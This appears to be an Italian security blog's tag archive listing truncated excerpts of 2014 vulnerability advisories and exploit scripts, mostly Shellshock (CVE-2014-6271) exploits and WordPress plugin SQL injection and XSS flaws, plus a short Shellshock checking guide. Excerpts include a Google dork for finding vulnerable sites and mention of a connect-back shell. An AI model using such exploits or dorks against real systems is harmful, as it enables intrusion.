Tags archives: sicurezza

 

0

WordPress All In One WP Security 3.8.2 SQL Injection

Advisory ID: HTB23231 Product: All In One WP Security WordPress plugin Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy Vulnerable Version(s): 3.8.2 and probably prior Tested Version: 3.8.2 Advisory Publication: September 3, 2014 [without technical details] Vendor Notification: September 3, 2014 Vendor Patch: September 12, 2014 Public Disclosure: September 24, 2014 Vulnerability Type: SQL Injection [...]

 

0

WordPress Users Ultra 1.3.37 SQL Injection

################################################################################################# # Title : Wordpress Users Ultra Plugin – SQL injection Vulnerability # Risk : High+/Critical # Author : XroGuE # Google Dork : inurl: wp-content/plugins/users-ultra/ # Plugin Version : 1.3.37 # Plugin Name : users ultra # Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip # Vendor Home : http://www.usersultra.com/ # Date : 2014/09/27 # Tested in [...]

 

0

WordPress All In One Security And Firewall 3.8.3 XSS

Document Title: =============== All In One Wordpress Firewall 3.8.3 – Persistent Vulnerability     References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1325     Release Date: ============= 2014-09-29     Vulnerability Laboratory ID (VL-ID): ==================================== 1327     Common Vulnerability Scoring System: ==================================== 3.3     Product & Service Introduction: =============================== WordPress itself is a very secure platform. However, [...]

 

0

IPFire 2.15 Bash Command Injection

#!/usr/bin/env python # # Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock) # # Exploit Author : Claudio Viviani # # Vendor Homepage : http://www.ipfire.org # # Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso # # Date : 2014-09-29 # # Fixed version: IPFire 2.15 core 83 (2014-09-28) # # Info: IPFire is [...]

 

0

DHCP Client Bash Environment Variable Code Injection

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’ require ‘rex/proto/dhcp’   class Metasploit3 < Msf::Auxiliary   include Msf::Exploit::Remote::DHCPServer   def initialize super( ‘Name’ => ‘DHCP Client Bash Environment Variable Code Injection’, ‘Description’ => %q{ This module exploits a code injection in specially crafted environment variables in Bash, specifically [...]

 

0

Apache mod_cgi Bash Environment Variable Code Injection

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager   def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Apache mod_cgi Bash Environment Variable Code Injection’, ‘Description’ => %q{ This module exploits a code injection in specially crafted [...]

 

0

Gnu Bash 4.3 CGI Scan Remote Command Injection

#!/usr/bin/env python   # http connection import urllib2 # Args management import optparse # Error managemen import sys   banner = “”” _______ _______ __ | _ .—–.–.–. | _ .—.-.—–| |–. |. |___| | | | |. 1 | _ |__ –| | |. | |__|__|_____| |. _ |___._|_____|__|__| |: 1 | |: 1 [...]

 

0

bashedCgi Remote Command Execution

require ‘msf/core’   class Metasploit3 < Msf::Auxiliary   include Msf::Exploit::Remote::HttpClient     def initialize(info = {}) super(update_info(info, ‘Name’ => ‘bashedCgi’, ‘Description’ => %q{ Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. }, ‘Author’ => [ 'Stephane Chazelas' [...]

 

0

Verificare che il nostro sistema è infetto da Shellshock

In questa guida vedremo come verificare e risolvere il problema di Shellshock nella nostra distribuzione Linux.

Shellshock Test
Nei giorni scorsi abbiamo rilasciato un’articolo dedicato a Shellshock, bug segnalato dai ricercatori di Red Hat che sta facendo molto parlare dato che “potrebbe” mettere a rischio milioni di personal computer e server. Come il solito, a poche ore dalla segnalazione i developer delle principali distribuzioni Linux avevano già rilasciato un’aggiornamento in grado di risolvere il bug, evitando cosi che utenti malintenzionati potessero utilizzare il bug per poter operare sul nostro sistema (operazione non molto semplice).
Possiamo inoltre verificare con estrema facilità se il nostro sistema operativo o meno è “infetto” da Shellshock.

Continua a leggere…

 

0

Gnu Bash 4.3 CGI REFERER Command Injection

#!/usr/bin/perl # # Title: Bash/cgi command execution exploit # CVE: CVE-2014-6271 # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Coded: 25 September 2014 # Published: 26 September 2014 # MorXploit Research # http://www.MorXploit.com # # Description: # Perl code to exploit CVE-2014-6271. # Injects a Perl connect back shell. # # Download: # http://www.morxploit.com/morxploits/morxbash.pl [...]